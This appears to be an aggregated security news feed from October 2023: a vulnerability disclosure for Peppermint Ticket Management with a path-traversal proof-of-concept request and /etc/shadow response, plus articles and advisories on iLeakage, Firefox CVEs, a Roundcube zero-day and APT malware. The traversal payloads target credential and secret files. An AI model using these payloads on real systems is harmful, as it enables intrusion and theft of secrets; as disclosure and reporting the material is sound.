Peppermint Ticket Management through 0.2.4 allows remote attackers to read arbitrary files via a /api/v1/ticket/1/file/download?filepath=../ POST request.

**Description**

When downloading a file attached to a ticket, it was observed to be able to download arbitrary files off the web server due to the filepath query parameter not being validated and passed directly to fs.createReadStream. Instructions to download and run the latest release were followed from here: https://github.com/Peppermint-Lab/peppermint/tree/master#-installation-with-docker

**Steps to Reproduce**

1.  Login to the application.
2.  Create a new ticket.
3.  Upload a file.
4.  Download the file and intercept the request in Burp Suite.
5.  Change the filepath parameter to "../../../../../../etc/shadow" or "../../../../../../etc/passwd" or "./.env"

**Proof of Concept Request and Response**

Request:

    POST /api/v1/ticket/1/file/download?filepath=../../../../../../etc/shadow HTTP/1.1
    Host: localhost:5000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.00) Gecko/20100101 Firefox/118.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: http://localhost:5000/ticket/1
    Content-Type: multipart/form-data; boundary=---------------------------9995410711832151211174726991
    Content-Length: 61
    Origin: http://localhost:5000
    Connection: close
    Cookie: token=<omitted>
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    -----------------------------9995410711832151211174726991--
    
    

Response:

    HTTP/1.1 200 OK
    Date: Sat, 14 Oct 2023 23:28:05 GMT
    Connection: close
    Content-Length: 476
    
    root:!::0:::::
    bin:!::0:::::
    daemon:!::0:::::
    adm:!::0:::::
    lp:!::0:::::
    sync:!::0:::::
    shutdown:!::0:::::
    halt:!::0:::::
    mail:!::0:::::
    news:!::0:::::
    uucp:!::0:::::
    operator:!::0:::::
    man:!::0:::::
    postmaster:!::0:::::
    cron:!::0:::::
    ftp:!::0:::::
    sshd:!::0:::::
    at:!::0:::::
    squid:!::0:::::
    xfs:!::0:::::
    games:!::0:::::
    cyrus:!::0:::::
    vpopmail:!::0:::::
    ntp:!::0:::::
    smmsp:!::0:::::
    guest:!::0:::::
    nobody:!::0:::::
    node:!:<omitted for security>
    nextjs:!:<omitted for security>
    

**Impact**

Allowing users to download system files, such as /etc/passwd, /etc/shadow, configuration files, application source code, and other users files. The etc/shadow file and .env file were able to be retrieved through the app.

**References**

https://cwe.mitre.org/data/definitions/22.html  
https://portswigger.net/web-security/file-path-traversal

CVE-2023-46864: Path Traversal - Arbitrary File Download · Issue #171 · Peppermint-Lab/peppermint

By Deeba Ahmed
What happens in iLeakage attacks is that the CPU is tricked into executing speculative code that reads sensitive data from memory. 
This is a post from HackRead.com Read the original post: iLeakage Attack: Theft of Sensitive Data from Apple’s Safari Browser

A team of researchers comprising Georgia Tech’s cybersecurity professors, Daniel Genkin and Jason Kim, University of Michigan’s Stephan van Schaik, and Ruhr University Bochum’s Yuval Yarom have published a research paper explaining a vulnerability they discovered in Apple devices that affects Macs and iPhones.

Researchers explained in the paper titled “iLeakage: Browser-based Timerless Speculative Execution Attacks on Apple Devices,” that the vulnerability, dubbed iLeakage, has been affecting Macs and iPhones since 2020. The attack mainly affects those devices that were built with Apple’s Arm-based A-series and M-series chips.

Researchers devised an attack that forced Apple’s Safari browser to divulge passwords, Gmail content, and other sensitive data by exploiting a side channel vulnerability in the CPUs. 

This vulnerability is built off an existing attack technique used on CPUs for over six years. Back in 2018, security researchers reported that all modern CPUs can be exploited to leak sensitive data by exploiting an integral feature on the processor called Speculative Execution. 

In this technique, modern CPUs try to improve performance by executing instructions before they know it is needed. iLeakage is a browser-based attack exploiting a timerless speculative execution flaw in Apple devices. Timerless speculative execution lets the CPU execute instructions even without any time running. The attackers can exploit this to perform malicious operations without getting detected.

What happens in iLeakage attacks is that the CPU is tricked into executing speculative code that reads sensitive data from memory. The attacker can exfiltrate this data without alerting the user. It is a dangerous attack because adversaries can perform them without needing the victim to click on malicious links or open infected documents/attachments.

The flaw exists in the way the Safari browser handles JavaScript timers. This allows attackers to create malicious JavaScript code and use it to steal sensitive data from the device. The stolen data may include passwords, PII (personal identification information), and credit card numbers. Using this data, attackers can commit crimes like identity theft and fraud.

Researchers noted that iLeakage attacks are currently effective on Apple devices running Safari. However, other platforms or browsers may also be vulnerable. Therefore, it is essential to exercise caution to prevent iLeakage attacks. Always keep your software up-to-date and use a security solution that can detect/block speculative execution attacks.

The findings were disclosed to Apple on 12 September 2022. The company acknowledged this issue, and Apple’s Product Security team and Safari browser development team collaborated with the researchers to develop countermeasures. As a result, Apple refactored Safari’s multi-process architecture. These changes are currently under active development and are available in Safari Technology Preview versions 173 and above.

Apple has released a new inter-process communication API to spawn new processes for pages launched with window.open(). Researchers have confirmed that the patch mitigates iLeakage attacks by preventing the consolidation of domains across security boundaries but it has limitations.

“We have empirically verified that this patch mitigates our attack by preventing the consolidation of domains across security boundaries. This means that while it is still possible to escape the speculative JavaScript sandbox, an attacker will only be able to read their own address space and therefore their own data,” researchers concluded.

The full report can be accessed here (PDF), and there is a dedicated site available to demonstrate the iLeakage attack.

Regarding this research, Lionel Litty, Chief Security Architect at Menlo Security, a Mountain View, Calif.-based provider of browser security stated that this attack shows browsers are the new OS. 

“This attack illustrates how for both attackers and defenders, the browser is the new OS, with web primitives such as origins and web workers that parallel OS primitives, such as applications and threads. Security practitioners must educate themselves on this attack surface.”

John Gallagher, Vice President of Viakoo Labs at Viakoo, a Mountain View, Calif.-based provider of automated IoT cyber hygiene noted that this attack method is not as significant as is the realization that threats are continually evolving. 

“The significance is not necessarily in this as an attack method, but more in how threats are evolving based on the tradeoff between speed and security. Prefetching of information to speed up CPU execution has been around for a while, and equally has been exploited for a while.  This is just a further “tit for tat”, and will be remediated in future CPU development.”

Gallagher, however, claims that in this attack, organizations aren’t at high risk because this attack requires a high degree of sophistication and there aren’t any reports that it has been exploited in the wild. 

“Organizations are not at high risk, given that this attack method requires a high degree of sophistication by the threat actor and has not been seen exploited yet in the wild (or at least not reported).  Organizations concerned (or high-value individual targets) should consider enabling lockdown mode, or using the MacOS (unstable) patch available,” Gallagher stated.

1.  According to Chrome, Safari and FireFox ThePirateBay is a Phishing Site
2.  Hackers Pwned Apple Safari in 20 seconds; Google Pixel in 60 seconds
3.  Bug in Safari browser leaks personal identifiers and browsing activity
4.  Apple Safari Safest, Google Chrome Riskiest Browser of 2022- Study

iLeakage Attack: Theft of Sensitive Data from Apple’s Safari Browser

An issue was discovered in VERMEG AgileReporter 21.3. XXE can occur via an XML document to the Analysis component.

CVE-2022-34832: XXE in AgileReporter 21.3 by VERMEG

The "iLeakage" attack affects all recent iPhone, iPad, and MacBook models, allowing attackers to peruse your Gmail inbox, steal your Instagram password, or scrutinize your YouTube history.

Researchers have developed a side-channel exploit for Apple CPUs, enabling sophisticated attackers to extract sensitive information from browsers.

Side-channel attacks are usually overlooked, often physical counterparts to traditional software hacks. Rather than an unsecured password or a vulnerability in a program, they take advantage of the extra information a computer system or hardware generates — in the form of sound, light, or electromagnetic radiation, for example, or in the time it takes to complete certain computations (a timing attack).

On Wednesday, four researchers — including two of those responsible for uncovering the Spectre processor vulnerability back in 2018 — published the details of such an attack, which they've named "iLeakage," affecting all recent iPhone, iPad, and MacBook models.

The researchers informed Apple of their findings on Sept. 12, 2022, according to their website, and the company has since developed a mitigation. However, it's still considered unstable, it's not enabled on devices by default, and mitigating is only possible on Macs, not mobile devices.

In comments provided to Dark Reading on background, an Apple spokesperson wrote, "This proof of concept advances our understanding of these types of threats. We are aware of the issue and it will be addressed in our next scheduled software release."

**How iLeakage Works**

iLeakage takes advantage of A- and M-series Apple silicon CPUs' capacity to perform speculative execution.

Speculative execution is a method by which modern CPUs predict tasks before they're even prompted, in order to speed up information processing. "This technique has been around for over 20 years, and today all modern CPUs use it — it significantly speeds up processing, even accounting for times it might get the anticipated instructions wrong," explains John Gallagher, vice president of Viakoo Labs.

The rub is that "cache inside the CPU holds a lot of valuable data, including what might be staged for upcoming instructions. iLeakage uses the Apple WebKit capabilities inside a browser to use JavaScript to gain access to those contents."

Specifically, the researchers used a new speculation-based gadget to read the contents of another webpage when a victim clicked on their malicious webpage.

"Alone, WebKit would not enable the cache contents to be divulged, nor would how A-Series and M-Series perform speculative execution — it's the combination of the two together that leads to this exploit," Gallagher explains.

**A Successor to Meltdown/Spectre**

"This builds on a line of attacks against CPU vulnerabilities that started around 2017 with Meltdown and Spectre," Lionel Litty, chief security architect at Menlo Security points out. "High level, you want to think about applications and processes, and trust that the operating system with help from the hardware is properly isolating these from one another," but those two exploits broke the fundamental isolation between different applications, and an application and operating system, that we tend to take for granted as users, he says.

iLeakage, then, is a spiritual successor that focuses on breaking the isolation between browser tabs.

The good news is, in their website's FAQ section, the researchers described iLeakage as "a significantly difficult attack to orchestrate end-to-end," which "requires advanced knowledge of browser-based side-channel attacks and Safari's implementation." They also noted that successful exploitation hasn't been demonstrated in the wild.

Were a capable enough attacker to come along and try it, however, this method is powerful enough to siphon just about any data users traffic online: logins, search histories, credit card details, what have you. In YouTube videos, the researchers demonstrated how their exploit could expose victims' Gmail inboxes, their YouTube watch histories, and their Instagram passwords, as just a few examples.

**iPhone Users Are Especially Affected**

Though it takes advantage of the idiosyncrasies in Safari's JavaScript engine specifically, iLeakage affects all browsers on iOS, because Apple's policies force all iPhone browser apps to use Safari's engine.

"Chrome, Firefox and Edge on iOS are simply wrappers on top of Safari that provide auxiliary features such as synchronizing bookmarks and settings. Consequently, nearly every browser application listed on the App Store is vulnerable to iLeakage," the researchers explained.

iPhone users are doubly in trouble, because the best fix Apple has released thus far only works on MacBooks (and, for that matter, only in an unstable state). But for his part, Gallagher backs Apple's ability to design an effective remediation.

"Chip-level vulnerabilities are typically hard to patch, which is why it is not surprising that there is not a fix for this right now. It will take time, but ultimately if this becomes a real exploited vulnerability a patch will likely be available," he says.

Safari Side-Channel Attack Enables Browser Theft

Debian Linux Security Advisory 5535-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, clickjacking, spoofing or information leaks.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5535-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 25, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2023-5721 CVE-2023-5724 CVE-2023-5725 CVE-2023-5728                 CVE-2023-5730 CVE-2023-5732Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, clickjacking, spoofing or information leaks.For the oldstable distribution (bullseye), these problems have been fixedin version 115.4.0esr-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 115.4.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmU5Z1kACgkQEMKTtsN8TjadIw//WpIFeCszG20DdDXl0HDi9sjn9bctL0ff5buoeWGMx3JHJa2D9vauwDLxnZFzPMfrr8W8ZUZpvFxl1u0n+n9BAfIkPMsjURbDZu6+wembDeVB8d5B2KH667UXhIHeaiEBrkT3wH0alq6HpkaoYkTipfkyerEIcKp2s0AB9L4qpr7RvGaCuyTTzR4Fm4UUCEja1aAFcywlLwDlyNJksNqHfU+LMeLIDIx/FjrT07C7fEB0KCcNNHRXYyEhMLDfmxUkrR/QIopQfsXohLDkodzU+K2J7rpjkgk5StbhLVnh3DVkANpALthySM65iovuDUXCoD7kCpIjshYxYtRioLYtiilRIVudOZ3uU/9TYN7sDXvFiN3OS1gOYk8aMIzHZHLKcp17VBHGP3z7tRlO5p5r/79jFq2aPuY++rIOCrf/rYMnykukgDEx2i6R8bpEfen1P5c7qbPWHqTAxo1EdDmSHGiDpxuhQ4ql+G3xDREoQgaFHWv6IwyBdcGteMNHSj++gy+p9Hcfh84ynzgpoHcl1tbpVeHw/356sKgJRbsIfYZapk3IPEvziWPtGBsZzMqVxxq4cM8yietTi8YXB83Xtutbf5QPUgPmCaHKW7icFI3zkcbhjqxO1GHJT06MsvqLnv8WtDQBPV42NcksVn6ccW0Ydrc+1JyJ2xwF8YpZaN8=DQzK-----END PGP SIGNATURE-----

Debian Security Advisory 5535-1

When opening a page in reader mode, the redirect URL could have caused attacker-controlled script to execute in a reflected Cross-Site Scripting (XSS) attack. This vulnerability affects Firefox for iOS < 119.

**Mozilla Foundation Security Advisory 2023-48**

Announced

October 24, 2023

Impact

high

Products

Firefox for iOS

Fixed in

*   Firefox for iOS 119

**#CVE-2023-5758: Cross-Site Scripting (XSS) in reader mode**

Reporter

Irwan

Impact

high

**Description**

When opening a page in reader mode, the redirect URL could have caused attacker-controlled script to execute in a reflected Cross-Site Scripting (XSS) attack.

**References**

*   Bug 1850019

CVE-2023-5758: Security Vulnerabilities fixed in Firefox for iOS 119

Memory safety bugs present in Firefox 118. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 119.

**Mozilla Foundation Security Advisory 2023-45**

Announced

October 24, 2023

Impact

high

Products

Firefox

Fixed in

*   Firefox 119

**#CVE-2023-5721: Queued up rendering could have allowed websites to clickjack**

Reporter

Kelsey Gilbert

Impact

high

**Description**

It was possible for certain browser prompts and dialogs to be activated or dismissed unintentionally by the user due to an insufficient activation-delay.

**References**

*   Bug 1830820

**#CVE-2023-5722: Cross-Origin size and header leakage**

Reporter

annevk

Impact

moderate

**Description**

Using iterative requests an attacker was able to learn the size of an opaque response, as well as the contents of a server-supplied Vary header.

**References**

*   Bug 1738426

**#CVE-2023-5723: Invalid cookie characters could have led to unexpected errors**

Reporter

Daniel Veditz

Impact

moderate

**Description**

An attacker with temporary script access to a site could have set a cookie containing invalid characters using document.cookie that could have led to unknown errors.

**References**

*   Bug 1802057

**#CVE-2023-5724: Large WebGL draw could have led to a crash**

Reporter

pwn2car

Impact

moderate

**Description**

Drivers are not always robust to extremely large draw calls and in some cases this scenario could have led to a crash.

**References**

*   Bug 1836705

**#CVE-2023-5725: WebExtensions could open arbitrary URLs**

Reporter

Shaheen Fazim

Impact

moderate

**Description**

A malicious installed WebExtension could open arbitrary URLs, which under the right circumstance could be leveraged to collect sensitive user data.

**References**

*   Bug 1845739

**#CVE-2023-5726: Full screen notification obscured by file open dialog on macOS**

Reporter

Edgar Chen and Hafiizh

Impact

moderate

**Description**

A website could have obscured the full screen notification by using the file open dialog. This could have led to user confusion and possible spoofing attacks.  
_Note: This issue only affected macOS operating systems. Other operating systems are unaffected._

**References**

*   Bug 1846205

**#CVE-2023-5727: Download Protections were bypassed by .msix, .msixbundle, .appx, and .appxbundle files on Windows**

Reporter

Marco Bonardo

Impact

moderate

**Description**

The executable file warning was not presented when downloading .msix, .msixbundle, .appx, and .appxbundle files, which can run commands on a user's computer.  
_Note: This issue only affected Windows operating systems. Other operating systems are unaffected._

**References**

*   Bug 1847180

**#CVE-2023-5728: Improper object tracking during GC in the JavaScript engine could have led to a crash.**

Reporter

anbu

Impact

moderate

**Description**

During garbage collection extra operations were performed on a object that should not be. This could have led to a potentially exploitable crash.

**References**

*   Bug 1852729

**#CVE-2023-5729: Fullscreen notification dialog could have been obscured by WebAuthn prompts**

Reporter

Shaheen Fazim

Impact

low

**Description**

A malicious web site can enter fullscreen mode while simultaneously triggering a WebAuthn prompt. This could have obscured the fullscreen notification and could have been leveraged in a spoofing attack.

**References**

*   Bug 1823720

**#CVE-2023-5730: Memory safety bugs fixed in Firefox 119, Firefox ESR 115.4, and Thunderbird 115.4.1**

Reporter

Jed Davis, Andrew McCreight, Randell Jesup, and the Mozilla Fuzzing Team

Impact

high

**Description**

Memory safety bugs present in Firefox 118, Firefox ESR 115.3, and Thunderbird 115.3. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 119, Firefox ESR 115.4, and Thunderbird 115.4.1

**#CVE-2023-5731: Memory safety bugs fixed in Firefox 119**

Reporter

Steve Fink, Stefan Arentz, and the Mozilla Fuzzing Team

Impact

high

**Description**

Memory safety bugs present in Firefox 118. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 119

CVE-2023-5731: Security Vulnerabilities fixed in Firefox 119

By Waqas
ESET Research Uncovers New Targeted Campaign Impacting European Governments and Think Tanks.
This is a post from HackRead.com Read the original post: APT Winter Vivern Exploits New Roundcube 0-Day to Target European Entities

The new 0-Day vulnerability was actively exploited by the Winter Vivern cyberespionage group before its discovery and subsequent patch by Roundcube, a web-based IMAP email client, with ESET’s report.

The Russian cyberespionage group Winter Vivern (_aka_ TA473, and UAC-0114), known for its persistent attacks on European and Central Asian governments, has once again made headlines. ESET, a Slovak cybersecurity firm, has recently revealed the group’s utilization of a 0-day (zero-day) cross-site scripting (XSS) vulnerability in the Roundcube Webmail server, signaling an alarming escalation in their tactics.

ESET researchers, who have been closely monitoring Winter Vivern’s activities for over a year, discovered the exploitation of this new vulnerability on October 11th, 2023. This XSS vulnerability, identified as CVE-2023-5631, allowed attackers to remotely compromise Roundcube Webmail servers, a popular email platform.

Notably, this vulnerability is distinct from CVE-2020-35730, a previously exploited flaw by the same group, as outlined in ESET’s research.

****Targeted Entities****

The campaign orchestrated by Winter Vivern focused on Roundcube Webmail servers belonging to governmental entities and a think tank, all situated within Europe. This is in line with the group’s primary objective of targeting government institutions and organizations in Europe and Central Asia.

****Modus Operandi****

Winter Vivern is infamous for employing a variety of tactics to infiltrate their targets, including the use of malicious documents, phishing websites, and a custom PowerShell backdoor. While there is a low level of confidence, ESET researchers suggest a potential connection between Winter Vivern and MoustachedBouncer, a Belarus-aligned group.

Since at least 2022, as reported by Hackread.com, Winter Vivern has been known to target Zimbra and Roundcube email servers owned by governmental entities. Additionally, the group exploited CVE-2020-35730, another XSS vulnerability in Roundcube, in August and September 2023.

It is worth mentioning that Winter Vivern is not the only threat actor exploiting Roundcube vulnerabilities. Sednit (also known as APT28) has been seen using the same XSS vulnerability in Roundcube, occasionally targeting the same victims.

****The Exploited Vulnerability (CVE-2023-5631)****

This XSS vulnerability, according to ESET’s blog post, could be exploited remotely by sending a specially crafted email message. In this particular campaign, the emails were sent from the address team.managment@outlookcom with the subject line “Get started in your Outlook.”

The malicious email appeared ordinary at first glance, but upon examining the HTML source code, a concealed SVG tag containing a base64-encoded payload was revealed. The payload was concealed within the onerror attribute of an image tag in the SVG. When decoded, this payload led to the execution of JavaScript code in the victim’s browser.

Surprisingly, the JavaScript injection worked even on fully patched Roundcube instances. The vulnerability was traced back to the server-side script rcube\_washtml.php, which did not adequately sanitize the malicious SVG document before incorporating it into the HTML page interpreted by the user.

ESET researchers reported the issue to Roundcube, and the vulnerability was patched promptly on October 14th, 2023. The affected Roundcube versions include 1.6.x before 1.6.4, 1.5.x before 1.5.5, and 1.4.x before 1.4.15.

The malicious email (ESET)

****Implications and Conclusion****

Winter Vivern’s transition to a 0-day vulnerability is a clear indication of their determination to infiltrate high-value targets. Despite the group’s relatively unsophisticated toolset, they remain a significant threat to European governments. Their success can be attributed to their persistent phishing campaigns and the prevalence of outdated, vulnerable applications used by targeted organizations.

In response to ESET’s discovery, the Roundcube team acted swiftly to address the vulnerability. A disclosure timeline reveals that the vulnerability was reported on October 12, and the necessary patches were released just two days later, ensuring the security of Roundcube Webmail servers.

ESET Research commended the Roundcube developers for their rapid response and collaboration in resolving the issue. It is vital that organizations and government entities keep their software up to date to mitigate the risk of such attacks in the future.

1.  ProtonMail Code Vulnerabilities Leaked Emails
2.  APTs Exploiting WinRAR 0day Flaw Despite Patch Availability
3.  Email Hacking Reigns as Top Cybersecurity Threat, Indusface Study
4.  Russian Hackers Employ Telekopye Toolkit in Broad Phishing Attacks
5.  Mozilla Rushes to Fix Critical Vulnerability in Firefox and Thunderbird
6.  EvilProxy Phishing Kit Targets Microsoft Users via Indeed.com Vulnerability

APT Winter Vivern Exploits New Roundcube 0-Day to Target European Entities

By Waqas
The feature is called IP Protection, and it's important to note that it is not a VPN. A VPN encrypts all of a user's traffic, while IP Protection only masks their IP address.
This is a post from HackRead.com Read the original post: Google Chrome to Mask User IP Addresses to Protect Privacy

Google is apparently working on a new Chrome browser feature called IP Protection, set for release in early 2024. This feature routes users’ internet traffic through a proxy server to hide their IP addresses

Google is developing a new feature for its **Chrome browser** called IP Protection, which will mask users’ IP addresses to protect their privacy. This feature is currently in development and is expected to be released to the public in early 2024.

IP Protection works by routing users’ traffic through a **proxy server**, which hides their real IP address from the websites and online services they visit. This can help prevent websites and online services from tracking users’ online activity and creating detailed profiles of them.

As seen **here**, the plan to conduct experiments was officially revealed on October 19th, along with an initial set of domains designated for proxying. Initially, requests to Google-owned domains will exclusively be directed through Google-owned proxies.

The feature can also help prevent users from being blocked from accessing websites or online services that are not available in their region.

It is worth noting that, IP Protection is an opt-in feature, therefore users will have the choice of whether or not to use it. It is also important to note that IP Protection is not a VPN. **A reliable VPN encrypts** all of a user’s traffic, while IP Protection only masks their IP address.

****Benefits of Using IP Protection****

There are several potential benefits to using IP Protection, including:

*   **Increased privacy:** IP Protection can help to protect users’ privacy from websites and online services that track users’ IP addresses. This can make it more difficult for these websites and services to create detailed profiles of users’ online activity.

*   **Improved security:** IP Protection can help to improve users’ security by preventing them from being tracked by malicious websites and online services. It can also help to prevent users from being blocked from accessing websites or online services that are not available in their region.

*   **Better performance:** In some cases, IP Protection can improve users’ internet performance by reducing the distance that their traffic has to travel.

****Potential** **Drawbacks of Using IP Protection****

There are also some potential drawbacks to using IP Protection, including:

*   **Reduced functionality:** Some websites and online services may not work properly when users are using IP Protection. This is because these websites and services may rely on users’ IP addresses to provide certain features or functionality.

*   **Increased bandwidth usage:** IP Protection can increase users’ bandwidth usage because their traffic is being routed through a proxy server.

*   **Decreased privacy:** While IP Protection can help to protect users’ privacy from websites and online services, it is important to note that the proxy servers used by IP Protection are operated by Google. This means that Google will be able to see users’ traffic, even if it is masked.

Overall, IP Protection is a promising new feature that can help to improve users’ privacy and security online. However, it is important to be aware of the potential drawbacks before using it.

****IP Protection as a Step Towards a More Privacy-Respecting Web****

IP Protection is just one of many steps that Google and other tech companies are taking to make the web more privacy-respecting. Other initiatives include phasing out third-party cookies and limiting fingerprinting, a feature that was introduced in the Mozilla Firefox browser **back in 2019**.

These initiatives are important because the web has become increasingly invasive in recent years. Websites and online services often collect vast amounts of data about users, including their IP addresses, browsing history, and purchase history. This data is then used to track users across the web and **target them with advertising**.

IP Protection and other privacy-enhancing features can help to give users more control over their privacy online. By masking users’ IP addresses and limiting fingerprinting, these features can make it more difficult for websites and online services to track users and create detailed profiles of them.

As more and more users adopt privacy-enhancing features, the web will become a more private place for everyone. This is a positive development for users and for the internet as a whole.

****_RELATED ARTICLES_****

1.  Google Makes Passkeys Default for All Users
2.  What is an OSINT Tool – Best OSINT Tools 2023
3.  Google offers Dark Web monitoring for US Gmail users
4.  Google’s Latest Android Feature Drop: Dark Web Search for Gmail ID
5.  Encrypted Email Service ProtonMail Now Supports Physical Security Keys

Google Chrome to Mask User IP Addresses to Protect Privacy

The threat actor known as DoNot Team has been linked to the use of a novel .NET-based backdoor called Firebird targeting a handful of victims in Pakistan and Afghanistan.
Cybersecurity company Kaspersky, which disclosed the findings in its APT trends report Q3 2023, said the attack chains are also configured to deliver a downloader named CSVtyrei, so named for its resemblance to Vtyrei.
"Some

Cyber Espionage / Malware

The threat actor known as DoNot Team has been linked to the use of a novel .NET-based backdoor called **Firebird** targeting a handful of victims in Pakistan and Afghanistan.

Cybersecurity company Kaspersky, which disclosed the findings in its APT trends report Q3 2023, said the attack chains are also configured to deliver a downloader named CSVtyrei, so named for its resemblance to Vtyrei.

"Some code within the examples appeared non-functional, hinting at ongoing development efforts," the Russian firm said.

Vtyrei (aka BREEZESUGAR) refers to a first-stage payload and downloader strain previously harnessed by the adversary to deliver a malware framework known as **RTY**.

DoNot Team, also known by the names APT-C-35, Origami Elephant, and SECTOR02, is suspected to be of Indian origin, with its attacks employing spear-phishing emails and rogue Android apps to propagate malware.

The latest assessment from Kaspersky builds on an analysis of the threat actor's twin attack sequences in April 2023 to deploy the Agent K11 and RTY frameworks.

The disclosure also follows Zscaler ThreatLabz's uncovering of new malicious activity carried out by the Pakistan-based Transparent Tribe (aka APT36) actor targeting Indian government sectors using an updated malware arsenal that comprises a previously undocumented Windows trojan dubbed ElizaRAT.

"ElizaRAT is delivered as a .NET binary and establishes a C2 communication channel via Telegram, enabling threat actors to exert complete control over the targeted endpoint," security researcher Sudeep Singh noted last month.

Active since 2013, Transparent Tribe has utilized credential harvesting and malware distribution attacks, often distributing trojanized installers of Indian government applications like Kavach multi-factor authentication and weaponizing open-source command-and-control (C2) frameworks such as Mythic.

In a sign that the hacking crew has also set its eyes on Linux systems, Zscaler said it identified a small set of desktop entry files that pave the way for the execution of Python-based ELF binaries, including GLOBSHELL for file exfiltration and PYSHELLFOX for stealing session data from the Mozilla Firefox browser.

"Linux-based operating systems are widely used in the Indian government sector," Singh said, adding the targeting of the Linux environment is also likely motivated by India's decision to replace Microsoft Windows OS with Maya OS, a Debian Linux-based operating system, across government and defense sectors.

Joining DoNot Team and Transparent Tribe is another nation-state actor from the Asia-Pacific region with a focus on Pakistan.

Codenamed Mysterious Elephant (aka APT-K-47), the hacking group has been attributed to a spear-phishing campaign that drops a novel backdoor called ORPCBackdoor that's capable of executing files and commands on the victim's computer, and receive files or commands from a malicious server.

According to the Knownsec 404 Team, APT-K-47 shares tooling and targeting overlaps with that of other actors such as SideWinder, Patchwork, Confucius, and Bitter, most of which are assessed to be aligned with India.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#firefox